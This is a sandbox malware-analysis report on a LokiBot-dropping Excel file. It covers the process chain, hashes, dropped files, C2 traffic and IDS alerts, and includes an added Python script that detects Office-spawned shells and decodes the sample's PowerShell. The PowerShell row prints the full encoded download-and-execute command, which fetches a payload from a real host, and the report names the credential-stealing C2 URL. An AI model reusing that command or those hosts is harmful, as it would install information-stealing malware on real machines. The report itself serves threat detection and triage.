File name: 2110375802.xls

Full analysis: https://app.any.run/tasks/28cb14ca-b5e1-4391-87e7-272618fa2a54
Verdict: Malicious activity
Threats: LokiBot

LokiBot was developed in 2015 to steal information from a variety of applications. Despite its age, this malware is still popular among cybercriminals.

Analysis date: November 14, 2018, 10:39:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, trojan, lokibot
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Nov 13 22:51:19 2018, Last Saved Time/Date: Tue Nov 13 22:51:21 2018, Security: 0
MD5: 83DEAC16DB073345CA12C3F981E37BF3
SHA1: DCC4E8FF81B14FFF6AB03C606D71F79827839B88
SHA256: 60187E0A37AEF0C2B540D839402979DE34C5AA0E165B5C3B7F836808635DE02C
SSDEEP: 1536:tDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAdIEZxlv/umee+m0V25MikRGhjMhY/F:tDZ+RwPONXoRjDhIcp0fDlaGGx+cL26+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's own assessment. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • c7k5UCte.exe (PID: 3308)
      • mstsc.exe (PID: 2376)
    • Executes PowerShell scripts
      • cMD.exe (PID: 4080)
    • Unusual execution from Microsoft Office
      • EXCEL.EXE (PID: 2844)
    • Starts CMD.EXE for command execution
      • EXCEL.EXE (PID: 2844)
    • Changes the autorun value in the registry
      • c7k5UCte.exe (PID: 3308)
    • LOKIBOT was detected
      • mstsc.exe (PID: 2376)
    • Detected artifacts of LokiBot
      • mstsc.exe (PID: 2376)
    • Connects to CnC server
      • mstsc.exe (PID: 2376)
    • Actions look like stealing of personal data
      • mstsc.exe (PID: 2376)
  • SUSPICIOUS
    • Creates files in the user directory
      • powershell.exe (PID: 860)
      • mstsc.exe (PID: 2376)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 860)
      • c7k5UCte.exe (PID: 3308)
      • mstsc.exe (PID: 2376)
    • Loads DLL from Mozilla Firefox
      • mstsc.exe (PID: 2376)
  • INFO
    • Creates files in the user directory
      • EXCEL.EXE (PID: 2844)
    • Reads settings of System Certificates
      • powershell.exe (PID: 860)
    • Reads Microsoft Office registry keys
      • EXCEL.EXE (PID: 2844)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

CompObjUserType: Microsoft Office Excel 2003 Worksheet
CompObjUserTypeLen: 38
HeadingPairs:
  • Worksheets
  • 3
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2018:11:13 22:51:21
CreateDate: 2018:11:13 22:51:19
Software: Microsoft Excel
LastModifiedBy: PC
Author: PC
All screenshots are available in the full report
Total processes: 36
Monitored processes: 5
Malicious processes: 5
Suspicious processes: 0

Behavior graph

excel.exe → cmd.exe → powershell.exe → c7k5ucte.exe → mstsc.exe (#LOKIBOT)

Process information

PID 2844: EXCEL.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
  Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Microsoft Excel
  Version: 14.0.6024.1000

PID 4080: cMD.exe
  CMD: cMD & /C PowErSHeLl -En [remainder of the command line is cut in the report]
  Path: C:\Windows\system32\cMD.exe
  Parent process: EXCEL.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 860: powershell.exe
  CMD: PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZwBkAG0AVQA1AEMAUwBnAFIANQBFAHUANQA2ADkAMQBmADQAVAByAFMAOABsAHoAdwBFAF8AdAAgACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABHADIATwBtAGgAQQBsAEQAeQBHAFgAdwBwAGgAMQB3AGcAeABDAGkAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAFQAZgB4AEYATgBDAHcAUgB5AEoARQBDAG8AVAA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAYwA3AGsANQBVAEMAdABlAC4AZQB4AGUAJwA7AA0ACgBnAGQAbQBVADUAQwBTAGcAUgA1AEUAdQA1ADYAOQAxAGYANABUAHIAUwA4AGwAegB3AEUAXwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHUAcwByAHQAaQBqAC4AagBwAGcAJwAgACQASwBUAGYAeABGAE4AQwB3AFIAeQBKAEUAQwBvAFQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA=
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: cMD.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3308: c7k5UCte.exe
  CMD: "C:\Users\admin\c7k5UCte.exe"
  Path: C:\Users\admin\c7k5UCte.exe
  Parent process: powershell.exe
  User: admin
  Integrity level: MEDIUM
  Exit code: 0

PID 2376: mstsc.exe
  CMD: "C:\Windows\System32\mstsc.exe"
  Path: C:\Windows\System32\mstsc.exe
  Parent process: c7k5UCte.exe
  User: admin
  Company: Microsoft Corporation
  Integrity level: MEDIUM
  Description: Remote Desktop Connection
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
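The process table above is the whole infection chain in five rows: Excel starts cmd.exe, cmd.exe starts powershell.exe with a mixed-case `-En` (a prefix of `-EncodedCommand`) followed by a base64 blob, PowerShell drops c7k5UCte.exe, and that dropper ends up in mstsc.exe. The script below is an added example, not code from ANY.RUN or from this report; it rebuilds those five process records (parent PIDs are inferred from the "Parent process" names the table gives, the cmd.exe command line is reproduced only as far as the report shows it), flags the Office-to-shell ancestry and the encoded command line, and decodes the base64 payload copied verbatim from the PID 860 row (PowerShell encodes it as UTF-16LE, which is why a plain UTF-8 decode shows NUL-separated characters). The Office and shell image lists are assumptions, and the rule names are this example's own.

```python
import base64
import binascii
import re
from typing import Optional

# Base64 blob copied verbatim from the powershell.exe command line (PID 860) in the report.
ENCODED_COMMAND = "ZgB1AG4AYwB0AGkAbwBuACAAZwBkAG0AVQA1AEMAUwBnAFIANQBFAHUANQA2ADkAMQBmADQAVAByAFMAOABsAHoAdwBFAF8AdAAgACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAewAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIAAkAFkAbgBLAEIAeQBfAEUAbwBSADgAYQBWAEEAVwAgACwAIAAkAEcAMgBPAG0AaABBAGwARAB5AEcAWAB3AHAAaAAxAHcAZwB4AEMAaQAgACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACAAJABHADIATwBtAGgAQQBsAEQAeQBHAFgAdwBwAGgAMQB3AGcAeABDAGkAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABLAFQAZgB4AEYATgBDAHcAUgB5AEoARQBDAG8AVAA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAYwA3AGsANQBVAEMAdABlAC4AZQB4AGUAJwA7AA0ACgBnAGQAbQBVADUAQwBTAGcAUgA1AEUAdQA1ADYAOQAxAGYANABUAHIAUwA4AGwAegB3AEUAXwB0ACAAJwBoAHQAdABwAHMAOgAvAC8AYQAuAGQAbwBrAG8ALgBtAG8AZQAvAHUAcwByAHQAaQBqAC4AagBwAGcAJwAgACQASwBUAGYAeABGAE4AQwB3AFIAeQBKAEUAQwBvAFQAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA="

# Process-creation records reconstructed from the report's process table:
# (pid, parent pid, image path, command line). Parent PIDs are inferred from the
# parent names the report lists (explorer.exe is outside the table, hence None).
# The cmd.exe command line is cut in the report, so only its visible prefix is used.
PROCESSES = [
    (2844, None, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'),
    (4080, 2844, r"C:\Windows\system32\cMD.exe", "cMD & /C PowErSHeLl -En"),
    (860, 4080, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PowErSHeLl -En " + ENCODED_COMMAND),
    (3308, 860, r"C:\Users\admin\c7k5UCte.exe", r'"C:\Users\admin\c7k5UCte.exe"'),
    (2376, 3308, r"C:\Windows\System32\mstsc.exe", r'"C:\Windows\System32\mstsc.exe"'),
]

# Assumed watch-lists for the rules below (hypothetical, extend to taste).
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)
ENV_PATH_RE = re.compile(r"\$env:(\w+)\s*\+\s*'([^']+)'", re.IGNORECASE)


def decode_encoded_command(blob: str) -> Optional[str]:
    """Decode a powershell.exe -EncodedCommand payload: base64 over UTF-16LE text.
    Returns None when the token is not well-formed base64 / UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def extract_iocs(script: str) -> dict:
    """Pull what triage wants from the decoded script: download URLs, drop paths
    built from environment variables, and the download-and-execute calls."""
    return {
        "urls": sorted(set(URL_RE.findall(script))),
        "drop_paths": [f"%{var.upper()}%{tail}" for var, tail in ENV_PATH_RE.findall(script)],
        "behaviours": [b for b in ("DownloadFile", "ShellExecute") if b in script],
    }


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_encoded_payload(cmdline: str) -> tuple:
    """Return (flag_seen, payload). powershell.exe accepts any prefix of
    -EncodedCommand (-e, -en, -enc, ...), so match case-insensitively on the
    prefix rather than on the full switch name; this sample used "-En"."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return True, (tokens[i + 1] if i + 1 < len(tokens) else None)
    return False, None


def triage(processes) -> list:
    """Walk the process tree; alert on shells with an Office ancestor and on
    encoded PowerShell command lines, decoding the payload when present."""
    by_pid = {p[0]: p for p in processes}
    alerts = []
    for pid, ppid, image, cmdline in processes:
        # Rule 1: a scripting shell with an Office application anywhere up its ancestry.
        if basename(image) in SHELL_IMAGES:
            chain, cur = [], ppid
            while cur in by_pid:
                chain.append(basename(by_pid[cur][2]))
                cur = by_pid[cur][1]
            if OFFICE_IMAGES & set(chain):
                alerts.append({"pid": pid, "rule": "office_spawns_shell",
                               "chain": " -> ".join(reversed(chain)) + f" -> {basename(image)}"})
        # Rule 2: encoded PowerShell; a truncated line still shows the flag, so alert on it too.
        flag_seen, payload = find_encoded_payload(cmdline)
        if flag_seen:
            decoded = decode_encoded_command(payload) if payload else None
            alerts.append({"pid": pid, "rule": "encoded_command", "decoded": decoded,
                           "iocs": extract_iocs(decoded) if decoded else None})
    return alerts


if __name__ == "__main__":
    for alert in triage(PROCESSES):
        print(alert)
```

Run as-is, the decoded PID 860 payload is a two-argument download-and-execute function wrapped in `try{...}catch{}`, called with `https://a.doko.moe/usrtij.jpg` and `%USERPROFILE%\c7k5UCte.exe`; that path matches the PID 3308 image in the table and the URL matches the powershell.exe connection to a.doko.moe:443 in the network section, which is the cross-check worth doing before trusting the decoded text.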
Total events: 1,251
Read events: 1,139
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 4
Suspicious files: 2
Text files: 3
Unknown types: 4

Dropped files

PID 2844, EXCEL.EXE: C:\Users\admin\AppData\Local\Temp\CVR212F.tmp.cvr
  Type, MD5 and SHA256 not recorded in the report

PID 860, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1W33Q1J80OG2PJLOIJKW.temp
  Type, MD5 and SHA256 not recorded in the report

PID 2376, mstsc.exe: C:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
  Type, MD5 and SHA256 not recorded in the report

PID 860, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18291e.TMP
  Type: binary
  MD5: 2E6C332796340AFFBFF5230455889D0D
  SHA256: 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E

PID 2376, mstsc.exe: C:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdb
  Type: text
  MD5: 5302B1B5EC232D44E2D9507FB847FC49
  SHA256: 20B58A25872B1E3F7D47DAE0C090ACF229C49B6E33939934513499CC37BB2684

PID 2376, mstsc.exe: C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe
  Type: executable
  MD5: 68B4A549D0B56A4DD9A488751037CF09
  SHA256: A9286688556DBB45303D3A0E7825294F58FFD48E125518AC33AB009426C967CC

PID 2844, EXCEL.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2110375802.xls.LNK
  Type: lnk
  MD5: 7611E5075B017DB880A07B77F8F64CB2
  SHA256: B8D92D9E05DFF6B74C1820A38566A1AA5DB1DDC37CE07C0E4E3B0C17A11F3BC5

PID 860, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Type: binary
  MD5: 2E6C332796340AFFBFF5230455889D0D
  SHA256: 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E

PID 2844, EXCEL.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Type: text
  MD5: 60F3263ED112F0C5BDD237A659938246
  SHA256: F28F638EC8739DC16D6D2F704C3C8BB1CB848B69C464EB2A348FC02BAA85FA96

PID 3308, c7k5UCte.exe: C:\Users\admin\AppData\Local\Temp\Disk.sys
  Type: executable
  MD5: AC6829C09D6E1FF82721D99F219B6CE2
  SHA256: 3469E8BA7FAC62360F352CBD1D2876A898030428A6D012A94F64EDADA423BB74
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 5
TCP/UDP connections: 6
DNS requests: 2
Threats: 0

HTTP requests

PID 2376, mstsc.exe: 5 × POST http://jekone.igg.biz/hm/sgbbu2/cat.php to 64.137.235.193:80 (country: CA), reputation: malicious. All five requests are identical; HTTP response code, content type and size are not recorded in the report.

Connections

PID 2376, mstsc.exe: 64.137.235.193:80 (jekone.igg.biz), ASN: 2267921 ONTARIO LTD, country: CA, reputation: malicious
PID 860, powershell.exe: 185.83.214.16:443 (a.doko.moe), ASN not recorded, country: PT, reputation: suspicious

DNS requests

a.doko.moe → 185.83.214.16 (reputation: unknown)
jekone.igg.biz → 64.137.235.193 (reputation: malicious)

Threats

All IDS alerts were raised on PID 2376 (mstsc.exe), class "A Network Trojan was detected"; each of the five signatures fired twice:

  • ET TROJAN LokiBot User-Agent (Charon/Inferno)
  • ET TROJAN LokiBot Checkin
  • ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
  • ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
  • MALWARE [PTsecurity] Loki Bot Check-in M2
2 ETPRO signatures available at the full report
No debug info